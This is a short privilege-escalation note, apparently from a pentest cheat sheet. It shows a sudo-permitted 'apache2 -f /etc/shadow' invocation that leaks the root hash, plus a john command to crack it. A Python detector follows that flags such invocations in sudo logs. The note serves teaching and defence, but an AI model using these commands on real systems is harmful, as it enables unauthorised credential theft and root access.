Abusing intended functionality
This allows running apache2 as root without a password. Apache config files can Include arbitrary files, so root-only files can be read through the error output.

sudo /usr/sbin/apache2 -f /etc/shadow

This causes an error, but the root hash is leaked in the error output.
Then unshadow and crack the hash:

john shadow1 --wordlist=~/wordlist/rockyou.txt --pot=deleteme.pot

We use the --pot=deleteme.pot option to force john to start cracking again.
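
To catch the apache2 -f invocation described above in sudo logs, the following is an added detection example, not part of the original page. It assumes sudo's default syslog line format and that legitimate Apache configs live under /etc/apache2; the log lines are constructed samples.

```python
import posixpath
import re

ALLOWED_CONF_DIR = "/etc/apache2"  # assumption: where legitimate configs live

# Fields of sudo's default syslog line (assumed format).
SUDO_RE = re.compile(
    r"sudo:\s+(?P<user>\S+) : .*?PWD=(?P<pwd>\S+) ; USER=(?P<runas>\S+) ; "
    r"COMMAND=(?P<cmd>.+)$"
)

# Constructed sample lines, not taken from a real host.
SAMPLE_LOG = [
    "Jan 12 10:03:41 web01 sudo:    alice : TTY=pts/0 ; PWD=/home/alice ; USER=root ; COMMAND=/usr/sbin/apache2 -f /etc/shadow",
    "Jan 12 10:05:02 web01 sudo:    bob : TTY=pts/1 ; PWD=/etc/apache2 ; USER=root ; COMMAND=/usr/sbin/apache2 -f apache2.conf -k graceful",
    "Jan 12 10:07:19 web01 sudo:    carol : TTY=pts/2 ; PWD=/tmp ; USER=root ; COMMAND=/usr/sbin/apache2 -f/etc/apache2/../shadow",
]

def config_args(argv):
    """Return every path given via -f, written as '-f path' or '-fpath'."""
    paths, i = [], 1
    while i < len(argv):
        if argv[i] == "-f" and i + 1 < len(argv):
            i += 1
            paths.append(argv[i])
        elif argv[i].startswith("-f") and len(argv[i]) > 2:
            paths.append(argv[i][2:])
        i += 1
    return paths

def suspicious_apache_sudo(lines):
    """Return (user, resolved_path) for apache2 -f paths outside the allowed dir."""
    findings = []
    for line in lines:
        m = SUDO_RE.search(line)
        if not m or m["runas"] != "root":
            continue
        argv = m["cmd"].split()
        if not argv or posixpath.basename(argv[0]) != "apache2":
            continue
        for path in config_args(argv):
            # Relative paths resolve against the logged PWD; ".." is collapsed.
            full = posixpath.normpath(posixpath.join(m["pwd"], path))
            if not (full + "/").startswith(ALLOWED_CONF_DIR + "/"):
                findings.append((m["user"], full))
    return findings

if __name__ == "__main__":
    for user, path in suspicious_apache_sudo(SAMPLE_LOG):
        print(f"ALERT: {user} ran apache2 as root with config {path}")
```

Paths are resolved from the log text only, so a symlink inside /etc/apache2 that points elsewhere is not detected by this check.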